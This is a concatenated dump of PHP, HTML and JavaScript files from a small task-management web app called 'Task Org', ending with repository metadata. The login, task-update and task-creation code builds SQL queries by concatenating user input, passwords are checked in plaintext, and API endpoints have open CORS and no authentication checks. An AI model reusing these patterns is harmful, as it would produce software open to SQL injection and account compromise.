url:"../api/task/readByStatus.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var j;
for (j = 0; j < data.length; j++) {
if(data[j].WorkerId=="<?php echo $_SESSION["UserId"]?>"){
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
}
},error:function (request) {
console.log(request.responseText);
}
})
}
});
},error:function (request) {
console.log(request.responseText);
}
})
}
});
</script>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body>
</html><file_sep><?php
class User
{
private $conn;
private $table = 'users';
public $id;
public $username;
public $password;
public $type;
public function __construct($db)
{
$this->conn = $db;
}
public function read(){
$query='SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type ORDER BY t.id ASC';
$stmt=$this->conn->prepare($query);
$stmt->execute();
return $stmt;
}
public function login(){
$query='SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type AND u.username="'.$this->username.'" AND u.password="'.$<PASSWORD>.'"';
$stmt=$this->conn->prepare($query);
$stmt->execute();
return $stmt;
}
}<file_sep><?php
session_start();
include('../config/connection.php');
if(isset($_POST['submit'])){
$id = $_POST['id'];
$upit = "UPDATE tasks SET status=1 WHERE id=" . $id;
$execute = $con->query($upit);
header('Location:taskDetails.php?id='.$id);
}
if(isset($_POST['submitCancel'])){
$id = $_POST['id'];
$upit = "UPDATE tasks SET status=3 WHERE id=" . $id;
$execute = $con->query($upit);
header('Location:taskDetails.php?id='.$id);
}
if(!isset($_SESSION["UserId"])){
header('Location:index.php');
}
if(isset($_GET['id'])){
$id=$_GET['id'];
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<div id="map" style="height: 500px; width: 100%"></div>
<script>
function initMap() {
$.ajax({
url:"../api/task/readById.php",
data:{id:"<?php echo $id?>"},
dataType:"JSON",
success:function(data)
{
var lat = parseFloat(data[0].Longitude);
var lng = parseFloat(data[0].Latitude);
var location = {lat: lat, lng: lng};
var map = new google.maps.Map(document.getElementById("map"), {
zoom: 13,
center: location
});
var marker = new google.maps.Marker({
position: location,
map: map
});
},error:function (request) {
console.log(request.responseText);
}
});
}
</script>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=<KEY>&callback=initMap"
type="text/javascript"></script>
<div class="text-center" style="width: 70%; margin: auto; padding: 20px">
<h1 id="title"></h1>
<div id="status"></div>
<div id="description" class="card col-xs-12 col-md-8" style="width: 100%;margin: auto">
</div>
<br><br>
<h2>Deadline:</h2>
<div id="deadline" class="card" style="margin: auto;width: 200px;padding: 12px">
</div>
</div>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<script>
$(document).ready(function () {
$.ajax({
url:"../api/task/readById.php",
data:{id:"<?php echo $id?>"},
dataType:"JSON",
success:function(data)
{
$("#title").text(data[0].Name);
if(data[0].Status=="Completed"){
$("#status").append("<h3 style='color: darkgreen'>"+data[0].Status+"</h3>");
}else if(data[0].Status=="In Progress"){
$("#status").append("<h3 style='color: darkorange'>"+data[0].Status+"</h3>");
$("#status").append("<form method='post' action='taskDetails.php'><input type='hidden' name='id' value='"+data[0].TaskId+"'><a id='completeTask'><input type='submit' class='btn btn-primary' style='background-color:#e3a529;border-color:#e3b829;' name='submit' value='Complete Task'></form></a><br>");
if("<?php echo $_SESSION["Type"]?>"=="boss" || "<?php echo $_SESSION["Type"]?>"=="manager"){
$("#status").append("<form method='post' action='taskDetails.php'><input type='hidden' name='id' value='"+data[0].TaskId+"'><a id='cancelTask'><input type='submit' class='btn btn-primary' style='background-color:#e3a529;border-color:#e3b829;' name='submitCancel' value='Cancel Task'></form></a><br><br>");
}
}else if(data[0].Status=="Canceled"){
$("#status").append("<h3 style='color: darkred'>"+data[0].Status+"</h3>");
}
$("#description").text(data[0].Description);
$("#deadline").text(data[0].Time);
},error:function (request) {
console.log(request.responseText);
}
});
});
</script>
<!-- Optional JavaScript -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body>
</html>
<file_sep><?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include_once '../../config/Database.php';
include_once '../../models/Task.php';
$database = new Database();
$db = $database->connect();
$task = new Task($db);
$task->id=isset($_GET['id']) ? $_GET['id'] : die();
$result = $task->readByUser();
$num = $result->rowCount();
if($num>0){
$taskArr = array();
while ($row=$result->fetch(PDO::FETCH_ASSOC)){
$taskItem= array(
'Name'=>$row['Name'],
'TaskId'=>$row['TaskId'],
'Description'=>$row['Description'],
'Time'=>$row['Time'],
'Worker'=>$row['Worker'],
'WorkerId'=>$row['WorkerId'],
'Status'=>$row['Status'],
'Longitude'=>$row['Longitude'],
'Latitude '=>$row['Latitude']
);
array_push($taskArr, $taskItem);
}
echo json_encode($taskArr);
}else{
echo json_encode(array('message'=>'No tasks found'));
}<file_sep><?php
// Headers
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
header('Access-Control-Allow-Methods: DELETE');
header('Access-Control-Allow-Headers: Access-Control-Allow-Headers,Content-Type,Access-Control-Allow-Methods, Authorization, X-Requested-With');
include_once '../../config/Database.php';
include_once '../../models/Task.php';
$id = $_GET['id'];
$database = new Database();
$db = $database->connect();
// Instantiate blog post object
$task = new Task($db);
$task->id =$id;
if($task->completeTask()){
echo json_encode(
array('message' => 'Task Completed')
);
}else{
echo json_encode(
array('message' => 'Task Not Completed')
);
}
<file_sep><?php
//session_start();
//if(isset ($_SESSION["Type"])=="banned"){
//echo '<script type="text/javascript">';
// echo ' alert("You have been banned")'; //not showing an alert box.
// echo '</script>';
//header('Location:home.php');
//}
//?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<link href="css/bruh.css" rel="stylesheet">
<title>Task Org</title>
</head>
<body>
<section class="jumbotron text-center">
<div class="container">
<h1 class="jumbotron-heading">Task Org</h1>
<p class="lead text-muted" id="text-hehe">Organise your buisness with our simple app, less is more!</p>
<p>
<a href="login.php" class="btn btn-primary ">Log in</a>
<a href="register.php" class="btn btn-secondary">Register</a>
</p>
</div>
</section>
<div class="album text-muted">
<div class="container">
<div class="row">
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic1" style="height: 280px; width: 100%; display: block;" src="img/index-participants.jpg" data-holder-rendered="true">
<p class="card-text">Add participants to your project and assign them tasks with time limits and locations!</p>
</div>
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic2" src="img/index-management.jpg" data-holder-rendered="true" style="height: 280px; width: 100%; display: block;">
<p class="card-text">Manage users and change their permisions!</p>
</div>
<div class="card col-xs-12 col-md-4">
<img data-src="holder.js/100px280/thumb" alt="pic3" src="img/index-eff.png" data-holder-rendered="true" style="height: 280px; width: 100%; display: block;">
<p class="card-text">The most efficent and secure way of doing buisness.</p>
</div>
</div>
</div>
</div>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
</body>
</html><file_sep><?php
session_start();
include('../config/connection.php');
$check=true;
if (isset($_POST['submit'])) {
if(!empty($_POST['name'])){
if(strlen($_POST['name'])>4) {
$name = $_POST['name'];
}else{
$check = false;
}
}else{
$check = false;
}
if(!empty($_POST['description'])){
if(strlen($_POST['description'])>4) {
$description = $_POST['description'];
}else{
$check = false;
}
}else{
$check = false;
}
if($check){
$upit = 'INSERT INTO tasks(id, name, text, time, userId, lng, lat, status) VALUES (NULL,"'.$name.'","'.$description.'","'.$_POST['date'].'",'.$_POST['worker'].',"42.428303","19.270615",2)';
$execute = $con->query($upit);
header('Location:home.php');
}
}
if (!isset($_SESSION["UserId"])) {
header('Location:index.php');
}
if ($_SESSION["Type"]=="worker") {
header('Location:home.php');
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/submitBtn.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<div class="text-center col-xs-12 col-sm-10 col-md-6" style="margin: auto; padding: 20px">
<!-- Material form contact -->
<div class="card">
<h5 class="card-header info-color white-text text-center py-4" style="background-color: #fcb628">
<strong>Create Task</strong>
</h5>
<!--Card content-->
<div class="card-body px-lg-5 pt-0">
<!-- Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>" class="text-center" style="color: #757575;">
<div class="md-form mt-3">
<input type="text" id="name" name="name" class="form-control">
<label for="name">Name</label>
</div>
<div class="md-form">
<input type="text" id="description" name="description" class="form-control">
<label for="description">Description</label>
</div>
<span>Worker</span>
<div class="row d-flex justify-content-center">
<select class="form-control" name="worker" style="width: 180px; align-self: center">
<?php
$upit = "SELECT username,id FROM users WHERE type=2";
$execute = $con->query($upit);
while ($row = $execute->fetch_assoc()){
echo "<option value='".$row['id']."'>".$row['username']."</option>";
}
?>
</select>
</div><br>
<!--date -->
<div class="md-form row d-flex justify-content-center">
<input type="text" name="date" id="date" class="form-control" style="width: 170px">
</div>
<label for="date">Deadline(YYYY-MM-DD)</label>
<!--Map-->
<div id="map" style="height: 500px; width: 100%"></div>
<script>
function initMap() {
var lat = parseFloat("19.265580");
var lng = parseFloat("42.436558");
var location = {lat: lat, lng: lng};
var map = new google.maps.Map(document.getElementById("map"), {
zoom: 13,
center: location
});
var marker = new google.maps.Marker({
position: location,
map: map
});
}
</script>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=<KEY>&callback=initMap"
type="text/javascript"></script>
<!-- Send button -->
<button id="create" class="btn btn-outline-info btn-rounded btn-block z-depth-0 my-4 waves-effect" disabled name="submit" type="submit">Send</button>
</form>
<!-- Form -->
</div>
</div>
<!-- Material form contact -->
</div>
<script>
$(document).ready(function(){
$("#date").on('input', function() {
function isValidDate() {
var dateString = $("#date").val();
var regEx = /^\d{4}-\d{2}-\d{2}$/;
if(!dateString.match(regEx)) return false; // Invalid format
var d = new Date(dateString);
var dNum = d.getTime();
if(!dNum && dNum !== 0) return false; // NaN value, Invalid date
return d.toISOString().slice(0,10) === dateString;
}
if(isValidDate()){
$( "#create" ).prop( "disabled", false );
}else{
$( "#create" ).prop( "disabled", true );
}
});
});
</script>
<!-- Optional JavaScript -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body> | 63422b8d77847c71e6377c9dd8c5459b98f24d2c | [
"SQL",
"PHP"
] | 14 | PHP | NemanjaKk/TaskOrg | d4fff5841a2724e2f96ebbb736df953abdaebdef | e82bccb752548183d3e76239490ea1df913b5338 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.